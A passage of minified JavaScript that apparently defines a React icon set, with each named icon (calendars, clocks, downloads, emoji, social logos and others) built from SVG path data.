1-2.865-2.106A5 5 0 1 1 12 7Zm-3 5a3 3 0 1 0 6 0 3 3 0 0 0-6 0Z"})),author_user_human_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm3.5 13.533c0 .672-.545 1.217-1.217 1.217H4.967a1.217 1.217 0 0 1-1.217-1.217 7.283 7.283 0 0 1 7.283-7.283h1.934a7.283 7.283 0 0 1 7.283 7.283Z"})),author_user_human_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M7.5 8a4.5 4.5 0 0 0 2.43 3.996A8.754 8.754 0 0 0 3.25 20.5c0 .414.336.75.75.75h16a.75.75 0 0 0 .75-.75 8.754 8.754 0 0 0-6.68-8.504A4.5 4.5 0 1 0 7.5 8Z"})),author_user_human_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm4 14a.75.75 0 0 1-.75.75H4a.75.75 0 0 1-.75-.75v-3A4.75 4.75 0 0 1 8 13.25h8A4.75 4.75 0 0 1 20.75 18v3Z"})),author_user_human_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0ZM12 12.75c3.518 0 6.62 1.696 8.337 4.088.411.573.6 1.197.568 1.816a2.84 2.84 0 0 1-.645 1.626c-.723.902-1.951 1.47-3.26 1.47H7c-1.308 0-2.537-.568-3.26-1.47a2.838 2.838 0 0 1-.644-1.626c-.032-.62.156-1.243.568-1.816C5.38 14.446 8.483 12.75 12 12.75Z"})),book_reading_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 1.25a6.25 6.25 0 0 1 4.25 10.83V16a.75.75 0 0 1-.75.75H7a2.25 2.25 0 0 0 0 4.5h11a.75.75 0 0 1 0 1.5H7A3.75 3.75 0 0 1 3.25 19V7A3.75 3.75 0 0 1 7 3.25h2.92c1.141-1.23 2.77-2 4.58-2ZM7 4.75A2.25 2.25 0 0 0 4.75 7v9A3.733 3.733 0 0 1 7 15.25h10.25v-2.137A6.25 6.25 0 0 1 8.887 4.75H7Zm7.5-.5a.75.75 0 0 0-.75.75v3a.75.75 0 0 0 .415.67l2 1a.75.75 0 0 0 .67-1.34l-1.585-.794V5a.75.75 0 0 0-.75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M16 19.75a.75.75 0 0 0 0-1.5H7a.75.75 0 0 0 0 1.5h9Z"})),book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm6.75 17.25v-1.75h-3.5v1.75a.75.75 0 0 1-1.5 0v-3.092c0-.74.22-1.464.63-2.08l1.219-1.828a1.684 1.684 0 0 1 2.802 0l1.22 1.828c.41.616.629 1.34.629 2.08V18.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.847 12.332a.184.184 0 0 1 .306 0l1.22 1.828c.216.326.344.701.371 1.09h-3.488a2.25 2.25 0 0 1 .372-1.09l1.219-1.828Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),calendar_date_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.01 12.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 9v10.5A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5V9Zm18 .75H3.75v9.75c0 .69.56 1.25 1.25 1.25h14c.69 0 1.25-.56 1.25-1.25V9.75Z",clipRule:"evenodd"})),calendar_date_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.76 1.376a.751.751 0 0 1 1.48.247l-.104.626H21a.751.751 0 0 1 .749.75h.002v16A2.75 2.75 0 0 1 19 21.75H8a2.75 2.75 0 0 1-2.736-2.468L5.251 19v-.75H3.314a1.75 1.75 0 0 1-1.688-2.216L5.278 2.8l.043-.117A.75.75 0 0 1 6 2.25h3.614l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873Zm2.368 14.855a2.751 2.751 0 0 1-2.65 2.018H6.75V19l.006.128A1.25 1.25 0 0 0 8 20.251h11c.69 0 1.25-.56 1.25-1.25V8.538l-2.123 7.693Zm-5.152-8.812a.75.75 0 0 0-.81-.09l-2 1a.75.75 0 0 0 .67 1.341l.5-.25-.909 3.33h-.926a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5h-.518l1.241-4.553a.75.75 0 0 0-.248-.778Z",clipRule:"evenodd"})),calendar_date_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17 2.75V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2Zm-13.25 7h16.5v9.75c0 .69-.56 1.25-1.25 1.25H5c-.69 0-1.25-.56-1.25-1.25V9.75Z"})),calendar_date_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17.5 2a1 1 0 1 0-2 0v.75H13V2a1 1 0 1 0-2 0v.75H8.5V2a1 1 0 0 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-1.5V2Zm-1.49 7a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 11 7 10.552 7 10s.457-1 1.01-1Zm1 4.5a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm3-1a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm5 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 18 7 17.552 7 17s.457-1 1.01-1Z",clipRule:"evenodd"})),caret_up_top_triangle_angle_arrow_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 17.75c1.442 0 2.265-1.646 1.4-2.8l-7-9.333a1.75 1.75 0 0 0-2.8 0l-7 9.333c-.865 1.154-.042 2.8 1.4 2.8h14Z",clipRule:"evenodd"})),category_book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75v-8H15v-3h5.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm3.5 13.5a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Zm.75 3.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),category_file_documents_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21 2.25a.75.75 0 0 1 .75.75v6.5a.75.75 0 0 1-.22.53l-1.28 1.28V18a.75.75 0 0 1-.75.75h-2.25V21a.75.75 0 0 1-.75.75H3a.75.75 0 0 1-.75-.75V5c0-.027.001-.053.004-.08A2.748 2.748 0 0 1 5 2.25h16ZM5 3.75a1.25 1.25 0 1 0 0 2.5h11.5a.75.75 0 0 1 .75.75v10.25h1.5V11c0-.199.08-.39.22-.53l1.28-1.28V3.75H5Zm5.25 10.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Zm-.75 2.25a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Z",clipRule:"evenodd"})),category_file_documents_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 19A1.75 1.75 0 0 1 21 20.75H4A2.75 2.75 0 0 1 1.25 18V6A2.75 2.75 0 0 1 4 3.25h11.172c.73 0 1.429.29 1.944.806l2.195 2.194H21c.966 0 1.75.784 1.75 1.75v11Zm-20-1c0 .69.56 1.25 1.25 1.25h.25V8c0-.966.784-1.75 1.75-1.75h11.19l-1.134-1.134a1.25 1.25 0 0 0-.884-.366H4c-.69 0-1.25.56-1.25 1.25v12Z"})),category_file_documents_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 3.25c.966 0 1.75.784 1.75 1.75v1.25H21c.966 0 1.75.784 1.75 1.75v11A1.75 1.75 0 0 1 21 20.75H6A1.75 1.75 0 0 1 4.25 19v-.25H3A1.75 1.75 0 0 1 1.25 17V8c0-.966.784-1.75 1.75-1.75h8.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513H19Zm-3.586 1.5a.25.25 0 0 0-.177.073l-2.414 2.414a1.75 1.75 0 0 1-1.237.513H3a.25.25 0 0 0-.25.25v9c0 .138.112.25.25.25h1.25V11c0-.966.784-1.75 1.75-1.75h7.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513h1.836V5a.25.25 0 0 0-.25-.25h-3.586Z",clipRule:"evenodd"})),category_file_documents_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M8.586 3.25c.464 0 .91.185 1.237.513L11.81 5.75H18a2.75 2.75 0 0 1 2.75 2.75v1.75H22a.75.75 0 0 1 .686 1.055l-4 9a.75.75 0 0 1-.686.445H2a.75.75 0 0 1-.749-.75L1.25 5c0-.966.784-1.75 1.75-1.75h5.586ZM3 4.75a.25.25 0 0 0-.25.25v11.465l2.564-5.77.052-.096A.75.75 0 0 1 6 10.25h13.25V8.5c0-.69-.56-1.25-1.25-1.25H8a.75.75 0 0 1 0-1.5h1.69l-.927-.927a.25.25 0 0 0-.177-.073H3Z",clipRule:"evenodd"})),clock_reading_time_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25 1.25 6.063 1.25 12 6.063 22.75 12 22.75ZM11 6a1 1 0 1 1 2 0v5.382l3.447 1.723.09.051a1 1 0 0 1-.89 1.78l-.094-.041-4-2A1 1 0 0 1 11 12V6Z",clipRule:"evenodd"})),clock_reading_time_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 2.5V1.296A10.753 10.753 0 0 0 1.296 11H2.5a1 1 0 1 1 0 2H1.296A10.753 10.753 0 0 0 11 22.704V21.5a1 1 0 1 1 2 0v1.204A10.753 10.753 0 0 0 22.704 13H21.5a1 1 0 1 1 0-2h1.204A10.753 10.753 0 0 0 13 1.296V2.5a1 1 0 1 1-2 0Zm5.707 4.793a1 1 0 0 0-1.414 0L12 10.586l-1.793-1.793-.076-.068a1 1 0 0 0-1.338 1.482L10.586 12l-.793.793a1 1 0 1 0 1.414 1.414l.793-.793.793.793.076.068a1 1 0 0 0 1.406-1.406l-.068-.076-.793-.793 3.293-3.293a1 1 0 0 0 0-1.414Z",clipRule:"evenodd"})),clock_reading_time_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.5 1.25a7.25 7.25 0 0 1 7.25 7.25 7.222 7.222 0 0 1-2.001 4.997L20.75 16A6.75 6.75 0 0 1 14 22.75H2a.75.75 0 0 1-.75-.75v-7A6.75 6.75 0 0 1 8 8.25h.257a7.248 7.248 0 0 1 7.243-7Zm0 1.5a5.75 5.75 0 1 0 0 11.5 5.75 5.75 0 0 0 0-11.5ZM14 18.5a1 1 0 0 0-1-1H6a1 1 0 1 0 0 2h7a1 1 0 0 0 1-1Zm-5-5a1 1 0 1 1 0 2H6a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.5 5.111a1 1 0 1 1 2 0v3.3l1.485.826.087.054a1 1 0 0 1-.966 1.739l-.091-.045-2-1.111A1 1 0 0 1 14.5 9V5.11Z"})),confused_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 9a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm-5.95 8.51c.63-.68 2.871-2.237 6.317-1.617a.75.75 0 1 0 .266-1.476c-4.02-.723-6.758 1.075-7.683 2.073a.75.75 0 1 0 1.1 1.02Z",clipRule:"evenodd"})),correct_save_check_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.737 8.426a1 1 0 0 0-1.474-1.352l-4.794 5.23-1.762-1.761a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.444-.031l5.5-6Z",clipRule:"evenodd"})),correct_save_check_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18.731 5.36a1 1 0 0 1 1.537 1.28l-10 12a1.001 1.001 0 0 1-1.475.067l-5-5a1 1 0 1 1 1.414-1.414l4.225 4.225 9.3-11.159Z"})),cross_close_x_minimize_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.707 7.293a1 1 0 0 0-1.414 1.414L10.586 12l-3.293 3.293a1 1 0 1 0 1.414 1.414L12 13.414l3.293 3.293a1 1 0 0 0 1.414-1.414L13.414 12l3.293-3.293a1 1 0 0 0-1.414-1.414L12 10.586 8.707 7.293Z",clipRule:"evenodd"})),cross_x_close_minimize_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L13.414 12l5.293 5.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L12 13.414l-5.293 5.293a1 1 0 1 1-1.414-1.414L10.586 12 5.293 6.707a1 1 0 1 1 1.414-1.414L12 10.586l5.293-5.293Z"})),desktop_monitor_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 17.75H4A2.75 2.75 0 0 1 1.25 15V5A2.75 2.75 0 0 1 4 2.25h16A2.75 2.75 0 0 1 22.75 5v10A2.75 2.75 0 0 1 20 17.75h-7V20h3a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h3v-2.25Zm1.01-5.25a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Z",clipRule:"evenodd"})),dot_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Z",clipRule:"evenodd"})),download_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2 19v-4a1 1 0 1 1 2 0v4c0 .548.452 1 1 1h14a1 1 0 0 0 1-1v-4a1 1 0 1 1 2 0v4a3 3 0 0 1-3 3H5c-1.652 0-3-1.348-3-3Z"}),(0,a.createElement)("path",{d:"M12 1.5a1 1 0 0 0-1 1V8H7a1 1 0 0 0-.707 1.707l5 5a1 1 0 0 0 1.414 0l5-5A1 1 0 0 0 17 8h-4V2.5a1 1 0 0 0-1-1Z"})),download_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 21.53a.75.75 0 0 0 1.06 0l2.5-2.5a.75.75 0 0 0-.53-1.28h-1.75V13a.75.75 0 0 0-1.5 0v4.75H9.5a.75.75 0 0 0-.53 1.28l2.5 2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),facebook_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h6.412v-7.076H9.5V11.84h1.912v-1.22C11.412 7.462 12.84 6 15.94 6c.587 0 1.601.115 2.016.23V8.8a11.904 11.904 0 0 0-1.071-.035c-1.52 0-2.108.575-2.108 2.073v1.002h3.029l-.52 2.834h-2.51v7.076H19A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Z"})),google_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"m21.882 10.42-.103-.438h-9.485v4.036h5.667c-.588 2.81-3.318 4.289-5.549 4.289-1.623 0-3.333-.686-4.465-1.79a6.412 6.412 0 0 1-1.902-4.524c0-1.7.76-3.402 1.865-4.52 1.106-1.12 2.776-1.745 4.437-1.745 1.902 0 3.264 1.015 3.774 1.478l2.853-2.853c-.837-.74-3.136-2.603-6.72-2.603-2.764 0-5.414 1.065-7.352 3.007C2.99 6.669 2 9.434 2 12c0 2.566.937 5.193 2.79 7.12 1.98 2.056 4.784 3.13 7.671 3.13 2.627 0 5.117-1.035 6.892-2.913C21.098 17.488 22 14.93 22 12.249c0-1.129-.113-1.8-.118-1.829Z"})),growth_increase_up_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 6a1 1 0 0 1 1 1v6a1 1 0 0 1-1.706.707L18 11.414l-4.793 4.793a1 1 0 0 1-1.414 0L8.5 12.914l-4.993 4.993a1 1 0 0 1-1.414-1.414l5.7-5.7.073-.066a1 1 0 0 1 1.34.066l3.294 3.293L16.587 10l-2.293-2.293A1 1 0 0 1 15 6h6Z"})),hamicon_4_sloid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 3h18v3H3zm0 7.5h18v3H3v-3ZM3 18h18v3H3v-3Z"})),hamicon_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1ZM4 18a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1Zm6.5-13a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM17 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10 12a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0-7a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0 14a2 2 0 1 1 4 0 2 2 0 0 1-4 0Z"})),happy_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V8a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 0 1-2 0V8a1 1 0 0 1 1-1Zm-8 5.575a.675.675 0 0 0-.675.675 5.175 5.175 0 1 0 10.35 0 .675.675 0 0 0-.675-.675h-9Z",clipRule:"evenodd"})),heart_love_wishlist_favourite_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.433 5.288a5.797 5.797 0 0 0-8.198 0L12 5.523l-.235-.235a5.797 5.797 0 0 0-8.198 0 6.428 6.428 0 0 0 0 9.09l7.52 7.52a1.292 1.292 0 0 0 1.826 0l7.519-7.52a6.428 6.428 0 0 0 0-9.09Zm-4.169 1.285a1 1 0 1 0 0 2c.299 0 .595.114.822.341.323.323.46.76.41 1.183a1 1 0 0 0 1.986.234A3.43 3.43 0 0 0 18.5 7.5a3.156 3.156 0 0 0-2.236-.927Z",clipRule:"evenodd"})),hemicon_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h7.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hidden_hide_invisible_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.87 3.07a.75.75 0 0 1 1.06 1.061l-16.799 16.8a.75.75 0 0 1-1.06-1.06l1.857-1.859c-1.397-1.145-2.487-2.454-3.25-3.516a20.19 20.19 0 0 1-1.255-1.985 9.52 9.52 0 0 1-.067-.127l-.025-.049a.758.758 0 0 1 0-.673l.015-.03.016-.03.016-.03.007-.014a18.243 18.243 0 0 1 .72-1.217A20.435 20.435 0 0 1 3.33 7.486c1.938-2.067 4.873-4.237 8.672-4.238 2.269 0 4.231.778 5.852 1.84L19.87 3.07ZM8.874 14.067A3.73 3.73 0 0 1 8.25 12 3.75 3.75 0 0 1 12 8.25a3.73 3.73 0 0 1 2.066.624l-5.192 5.192Zm11.657-6.405c.205.008.397.1.533.253a20.672 20.672 0 0 1 1.933 2.583 17.693 17.693 0 0 1 .661 1.138l.01.019a.77.77 0 0 1 .004.68l-.016.03-.032.06-.007.014a18.22 18.22 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.224 2.855c-1.938 2.067-4.872 4.237-8.672 4.237a9.97 9.97 0 0 1-3.243-.545.752.752 0 0 